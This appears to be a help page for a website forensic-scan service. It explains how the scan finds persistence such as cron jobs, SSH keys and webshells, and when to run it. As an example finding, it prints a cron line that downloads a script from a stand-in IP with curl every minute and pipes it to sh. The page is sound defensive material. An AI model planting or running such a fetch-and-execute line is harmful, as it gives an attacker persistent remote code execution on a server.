What is a website forensic scan?
A website forensic scan examines the whole server a site runs on, looking for indicators of compromise rather than known malware files alone. It answers three questions: how did the attacker get in, what did they leave behind to keep access, and which sites and accounts are affected. That is the evidence you need before cleaning.
A file scanner can tell you that wp-content/uploads/2026/08/cache.php is a webshell. A forensic scan tells you that the same attacker also added a crontab entry that downloads it again every minute, planted an SSH key for the www-data user and started a tunnel agent. Remove the file without the rest and the site is re-infected before you have closed the terminal.
# Example finding: cron re-infection loop (fictional host)
*/1 * * * * curl -fsSL http://198.51.100.24/u.sh | sh >/dev/null 2>&1
# After clean-up
# no crontab for www-data
This is why every PatientZero clean-up starts with the dfir-fast profile. For the wider picture of why infections return, read why malware keeps coming back.
What does the dfir-fast profile check?
The dfir-fast profile checks persistence mechanisms, accounts and keys, recently changed code and live network activity. It is designed to run quickly on a production server, reading configuration and metadata rather than copying data off the machine, so you get a clear list of indicators of compromise within a single scan.
| Area | What is inspected |
|---|---|
| Scheduled tasks | User crontabs, /etc/crontab, /etc/cron.d, systemd timers |
| Services | Systemd units (system and user), unexpected ExecStart paths |
| Loader | /etc/ld.so.preload and injected shared libraries |
| Access | ~/.ssh/authorized_keys for all users, sshd_config, new system users |
| WordPress | Administrator accounts, recently modified PHP in wp-content, altered wp-config.php |
| Network | Listening sockets, established outbound connections, tunnel and VPN agents |
| Binaries | Executables in /tmp, /dev/shm and look-alike system binaries |
For malicious code inside site files, pair it with the Malware sweep, which applies signatures and heuristics to every PHP and JavaScript file.
When should you run a forensic scan?
Run a forensic scan as soon as you suspect a compromise, before deleting anything, and again after clean-up to prove persistence is gone. It is also worth running when you take on a server you did not build, such as a new agency client or a migrated VPS, so you know its starting state.
- Malware returns after a plugin or file clean-up
- Unknown administrator accounts appear in WordPress
- High CPU from processes you do not recognise
- Your host has sent an abuse or outbound spam report
- Google shows a "This site may be hacked" warning
Tip: do not wipe files before the scan. Timestamps, crontabs and running processes are evidence, and they point to the entry point. If you are dealing with an active incident, go to emergency help.